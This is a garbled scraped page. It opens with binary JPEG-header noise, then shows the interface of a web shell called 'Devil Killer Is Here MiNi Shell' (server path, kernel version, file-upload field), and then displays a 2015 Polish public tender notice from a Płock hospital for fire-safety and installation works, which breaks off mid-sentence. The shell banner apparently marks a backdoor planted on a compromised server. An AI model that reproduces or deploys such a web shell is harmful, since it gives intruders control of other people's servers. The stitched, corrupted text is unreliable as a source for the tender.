JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150709/171818-N-2015.html

<p class="kh_header"><b>Płock: Wydzielenie pożarowe klatek schodowych i wind z zastosowaniem skutecznej instalacji zapobiegania zadymieniu oraz modernizacja instalacji wodnej i instalacji elektrycznej -cz. wysoka budynku głównego Wojewódzkiego Szpitala Zespolonego w Płocku (postępowanie trzecie dla części 1 i części 3)</b><br>
<b>Numer ogłoszenia: 171818 - 2015; data zamieszczenia: 09.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Medyczna 19, 09-400 Płock, woj. mazowieckie, tel. 024 3646105, 3646330, faks 024 3646101,3646329.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wydzielenie pożarowe klatek schodowych i wind z zastosowaniem skutecznej instalacji zapobiegania zadymieniu oraz modernizacja instalacji wodnej i instalacji elektrycznej -cz. wysoka budynku głównego Wojewódzkiego Szpitala Zespolonego w Płocku (postępowanie trzecie dla części 1 i części 3).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A) Przedmiotem zamówienia jest
dostosowanie budynku głównego część wysoka (budynek A) 9-kondygnacyjnego o kubaturze ok. 50.000
m3 do wymagań ochrony przeciwpożarowej oraz poprawa bezpieczeństwa pożarowego zgodnie z
Programem Funkcjonalno-Użytkowym. Zakres zamówienia obejmuje: a)opracowanie: dokumentacji
projektowo instalacji hydrantowej wewnętrznej i zaworów hydrantowych, dokumentacji projektowo oddymiania klatek schodowych wraz z
szybami windowymi, b)wykonanie w imieniu Zamawiającego procedury zgłoszenia i rozpoczęcia robót, c)
wykonanie prac budowlanych zgodnie z zatwierdzonym projektem, d)opracowanie i przekazanie
zamawiającemu dokumentacji powykonawczej. B) Szczegółowy zakres rzeczowy zamówienia oraz obowiązki Wykonawcy określa: a) załącznik nr 1 do siwz - PFU. b) wzór umowy stanowiący załącznik nr 3
do siwz. C) Dane techniczne: Powierzchnia zabudowy - ok. 1.700 m2. Powierzchnia całkowita- 14.000 m2.
Kubatura - 50.000 m3. D) Poza ww. zakresem niniejsze zamówienie obejmuje: a) przeglądy gwarancyjne i
serwisowe, b) usuwanie w okresie gwarancji i rękojmi wad i usterek oraz naprawy zamontowanego sprzętu
i urządzeń.wych,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>A)	Zamawiający przewiduje udzielenie zamówień uzupełniających dla przedmiotu zamówienia analogicznego do określonego w przedmiotowym postępowaniu i zakresu do 10% wartości zamówienia podstawowego na zasadach określonych w art.67 ust.1 pkt 6 ustawy z dnia 29 stycznia 2004 r. uPzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający będzie żądał od Wykonawców wniesienia wadium w
wysokości: A) Część pierwsza zamówienia 5.000 zł (słownie złotych: pięć tysięcy).  B) Część trzecia zamówienia 10.000 zł
(słownie złotych: dziesięć tysięcy). Wadium należy wnieść do dnia 09-07-2015 r., do godz. 08:30. 2.
Wadium należy wnieść w jednej lub kilku formach określonych w art.45 ust.6 uPzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z wykorzystaniem załącznika nr 11 do siwz. W przedmiotowym zamówieniu nie są
wymagane od wykonawcy posiadanie uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) oświadczenie z wykorzystaniem załącznika nr 11 do siwz. b) wykonawca ubiegający się o
zmówienie musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składaniaofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej
jedno zamówienie na roboty budowlane polegające na dostosowaniu budynków do wymagań
przeciwpożarowych - część pierwsza - obejmujące roboty instalacji wodnych na kwotę nie niższą
niż 100.000,00 zł (brutto) część trzecia - obejmujące roboty instalacji wentylacji
mechanicznej i oddymiania na kwotę nie niższą niż 200.000,00 zł (brutto), Jako wykonanie
(zakończenie) zamówienia należy rozumieć wystawienie co najmniej Świadectwa Przyjęcia (dla
kontraktów realizowanych zgodnie z warunkami FIDIC) lub podpisanie Protokołu odbioru robót
lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa
Przyjęcia). Wartości podane w dokumentach potwierdzających spełnienie warunków w walutach
innych niż wskazane przez Zamawiającego należy przeliczać wg. średniego kursu NBP na dzień
opublikowania ogłoszenia o zamówieniu. Jeżeli w tym dniu NBP nie publikuje kursów walut,
należy przyjąć średni kurs z najbliższego dnia, w którym NBP publikuje kursy walut, po
opublikowaniu ogłoszenia w BZP. W przypadku składania oferty przez podmioty składające
ofertę łączną, ww. warunek musi spełnić co najmniej jeden podmiot albo wszyscy wykonawcy
wspólnie. Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu
stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich
informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z wykorzystaniem załącznika nr 11 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) oświadczenie z wykorzystaniem załącznika nr 11 do siwz. b) wykonawca ubiegający się o
zamówienie musi wykazać, że osoby, które będą uczestniczyć w wykonaniu zamówienia w
szczególności odpowiedzialne za kierowanie robotami budowlanymi, legitymują się
kwalifikacjami zawodowymi, niezbędnymi dla wykonania zamówienia. Zamawiający wymaga, aby
osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje
zawodowe: - kierownik robót instalacji sanitarnych - min. 1 osoba: posiada uprawnienia do
pełnienia samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca
1994 r.-Prawo budowlane (tekst jednolity: Dz.U. z 2013r. poz. 1409 z późn. zm.), tj. jest aktualnie
wpisany na listę członków właściwej izby samorządu zawodowego oraz posiada uprawnienia
budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,
instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych -
część 1 i 3. Każda wykazana osoba może jednocześnie potwierdzać spełnienie powyższych
warunków odrębnych dla każdej części zamówienia. Zamawiający, określając wymogi dla osoby w zakresie
posiadania uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które
zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im
uprawnienia wydane obywatelom innych państw w tym obywatelom Europejskiego Obszaru
Gospodarczego oraz Konferencji Szwajcarskiej z zastrzeżeniem art. 12a oraz przepisów ustawy
Prawo budowlane ((tekst jednolity: Dz.U. z 2013r. poz. 1409 z późn. zm.) oraz ustawy o
zasadach kwalifikacji zawodowej nabytych przez państwa członkowskie Unii Europejskiej (Dz.U.
z 2008 r. nr 63, poz.394). W przypadku składania oferty przez podmioty składające ofertę łączną,
ww. warunek musi spełnić co najmniej jeden podmiot albo wszyscy wykonawcy wspólnie.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu
stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich
informacje.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z wykorzystaniem załącznika nr 11 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga także dołączenia: A) Wypełnioną i podpisaną ofertę wg wzoru stanowiącego
załączniki nr 2 do siwz oraz załączniki: nr 5, 13, 14 do siwz (przykładowe wzory, z których wykonawca
może skorzystać), B) Dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentowania wykonawcy (jest to dokument zalecany, a nie wymagany). C) Oświadczenie osoby
uprawnionej do reprezentacji firmy (pełnomocnictwo) upoważniające do podpisania oferty i składania
ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu do
odpowiedniego rejestru. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać
imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis (lub czytelny podpis). Jeżeli dołączone do
oferty ww. pełnomocnictwo będzie w formie kopii, jego zgodność z oryginałem powinien poświadczyć
notariusz. D) W przypadku złożenia oferty łącznej (np. konsorcja lub spółki cywilne): a) z oferty musi
wynikać, jakie podmioty złożyły ofertę łączną (pełna nazwa i adres siedziby) oraz cel wspólnych działań
oraz wspólne zrealizowanie przedmiotu zamówienia. b) Wykonawcy ustanawiają pełnomocnika do
reprezentowania ich w postępowaniu lub do reprezentowania i zawarcia umowy. Dokument
potwierdzającyustanowienie pełnomocnika musi zawierać: - wskazanie postępowania o zamówienie
publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, -
ustanowionego pełnomocnika oraz zakres jego umocowania, - oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia, - podpisy prawnie
upoważnionych przedstawicieli każdego z partnerów. c) umowę konsorcjum lub spółki cywilnej wybrany
Wykonawca będzie musiał dostarczyć przed podpisaniem umowy. E) Kopii dowodu wniesienia wadium w
pieniądzu (np. wydruk dokonanego przelewu). Jeśli wadium jest wniesione w formie innej niż pieniężna -
wymagany oryginał dokumentu wadialnego. W przypadku, gdy wadium wniesione w formie pieniężnej,
wpłynie na rachunek bankowy zamawiającego, w terminie określonym w SIWZ, brak załączenia do oferty
dokumentu potwierdzającego wniesienie wadium nie stanowi podstawy do wykluczenia wykonawcy z
postępowania. F) Sporządzonego harmonogramu rzeczowo-finansowego zawierającego wszystkie
elementy określone we wzorze stanowiący załącznik nr 4 do siwz. Zamawiający nie dopuszcza modyfikacji
przez wykonawcę elementów harmonogramu. Dokumenty nie wymagane przez zamawiającego, a
załączone do oferty, nie będą mieć wpływu na ocenę oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Skrócenie terminu wykonania zamówienia - 5</li>
<li>3 - Termin gwarancji jakości i rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zapisów umowy w przypadku: 1. Zmiany osób odpowiedzialnych za
realizację przedmiotu zamówienia, pod warunkiem, że osoby te będą spełniały warunek udziału w
postępowaniu określone w siwz w zakresie kwalifikacji zawodowych i doświadczenia, 2. Aktualizacji
rozwiązań projektowych z uwagi na zmiany obowiązujących przepisów odnoszących się do tego
zamówienia, 3. Zaistnienia okoliczności prawnych, ekonomicznych lub technicznych, których nie można
było przewidzieć w momencie zawarcia umowy, za które żadna ze stron nie ponosi odpowiedzialności,
skutkujących brakiem możliwości należytego wykonania umowy zgodnie ze specyfikacją istotnych
warunków zamówienia. 4. Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie,
których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności
idoprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony. 5. Zmiany terminu
zakończenia zamówienia związanego z : 5.1 zwłoką instytucji opiniujących i uzgadniających czas
wykonania przypisanych im czynności o okres równy tej zwłoce, 5.2 zwłoką Zamawiającego w akceptacji wstępnego projektu technologicznego dłuższej niż 5 dni roboczych licząc od dnia jego przekazania o okres
równy tej zwłoce, 5.3 zwłoką w przekazaniu przez Zamawiającego placu budowy lub pomieszczeń dłuższej
niż 7 dni roboczych licząc od daty podpisania umowy lub siły wyższej. 6. Zmiany harmonogramu
rzeczowofinansowego, jeżeli wynika to ze zmiany: 6.1 kolejności wykonania robót, 6.2 podziału robót na
elementy rozliczeniowe i wynagrodzenia, 6.3 terminu wykonania zamówienia. 8. Konieczności
dostosowania postanowień niniejszej umowy do warunków określonych w umowach zawartych pomiędzy
Zamawiającym a Zarządem Województwa Mazowieckiego. 9. Podpisania aneksu do umowy o
dofinansowanie przedmiotu umowy, zmieniającego zasady i terminy realizacji. 10. Zmian postanowień
umowy, które są nieistotne w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy
tj. zmian, o których wiedza na etapie postępowania o udzielenie zamówienia nie miałaby wpływu na krąg
podmiotów ubiegających się o udzielenia zamówienia czy też na wynik postępowania przetargowego.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę.
Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital
Zespolony w Płocku, ul.Medyczna 19, 09-400 Płock. Opłata za przekazanie siwz będzie pobierana od
wykonawcy w wysokości określonej w zarządzeniu Dyrektora WSZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 08:30, miejsce: Wojewódzki Szpital Zespolony w Płocku, ul. Medyczna 19; 09-400 Płock - pok. nr
40 (budynek główny-administracja)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja o podwykonawcach: A) W ramach realizacji zamówienia zamawiający dopuszcza
możliwość powierzenia podwykonawcom części zamówienia. Zamawiający żąda wskazania przez
Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. B) W przypadku
kiedy wykonawca zamierza powierzyć część zamówienia podwykonawcom, którzy zgodnie z art. 26 ust. 2b
ustawy będą podmiotami udostępniającymi zasoby niezbędne do realizacji zamówienia, musi podać nazwę
(firmy) podwykonawców i załączyć do oferty dokumenty tych podmiotów, wymienione w pkt. 1.B oraz w pkt.
1.C). C) Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia zamierzający zawrzeć umowę
o podwykonawstwo, której przedmiotem są roboty budowlane jest obowiązany w tracie realizacji
zamówienia publicznego do przedłożenia do akceptacji zamawiającemu projektu tej umowy, przy
czymInformacja o podwykonawcach: A) W ramach realizacji zamówienia zamawiający dopuszcza
możliwość powierzenia podwykonawcom części zamówienia. Zamawiający żąda wskazania przez
Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. B) W przypadku kiedy wykonawca zamierza powierzyć część zamówienia podwykonawcom, którzy zgodnie z art. 26 ust. 2b
ustawy będą podmiotami udostępniającymi zasoby niezbędne do realizacji zamówienia, musi podać nazwę
(firmy) podwykonawców i załączyć do oferty dokumenty tych podmiotów, wymienione w pkt. 1.B oraz w pkt.
1.C). C) Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia zamierzający zawrzeć umowę
o podwykonawstwo, której przedmiotem są roboty budowlane jest obowiązany w tracie realizacji
zamówienia publicznego do przedłożenia do akceptacji zamawiającemu projektu tej umowy, przy
czympodwykonawca lub dalszy podwykonawca jest obowiązany dołączyć zgodę wykonawcy na zawarcie
umowy o podwykonawstwo o treści zgodnej z projektem umowy. D) Jeśli wykonawca powoływał się na
zasoby podwykonawcy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa
w art. 22 ust. 1, a dochodzi do zmiany albo rezygnacji z podwykonawcy, wykonawca jest obowiązany
wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w
stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. E) Zamawiający
określa następujące wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są roboty
budowlane, których niespełnienie spowoduje zgłoszenie przez Zamawiającego odpowiednio zastrzeżeń lub
sprzeciwu: a) umowa o podwykonawstwo musi być sporządzona w formie pisemnej, b) termin realizacji
przedmiotu umowy o podwykonawstwo nie może przekraczać terminów określonych w umowie między
Zamawiającym, a Wykonawcą, c) umowa o podwykonawstwo nie może przewidywać wynagrodzenia
podwykonawcy, które samodzielnie lub wraz z wynagrodzeniem innych podwykonawców - prowadziłoby do
przekroczenia wartości wynagrodzenia Wykonawcy, określonego w umowie pomiędzy Zamawiającym, a
Wykonawcą, d) umowa o podwykonawstwo nie może przewidywać zasad rozliczeń, które byłyby odmienne
od zasad przyjętych w umowie pomiędzy Zamawiającym i Wykonawcą, w szczególności termin zapłaty
wynagrodzenia podwykonawcy lub dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo
nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu
podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu
podwykonawcy dostawy, usługi lub roboty budowlanej. e) umowa o podwykonawstwo nie może
przewidywać wykonania robót w sposób odmienny, od przyjętego w umowie pomiędzy Zamawiającym i
Wykonawcą oraz Specyfikacji Istotnych Warunków Zamówienia, f) umowa o podwykonawstwo musi
zawierać zapisy dot. zobowiązania podwykonawcy (lub dalszego podwykonawcy) do wykonania
przedmiotu umowy zgodnie z prawem budowlanym, wiedza techniczną, obowiązującymi warunkami
technicznymi, polskimi normami oraz dokumentami określającymi przedmiot umowy, g) wynagrodzenie
brutto określone w umowie o podwykonawstwo musi uwzględniać wszystkie koszty i czynności niezbędne
do kompleksowego wykonania przedmiotu umowy, bez względu na faktyczny zakres robót niezbędny do
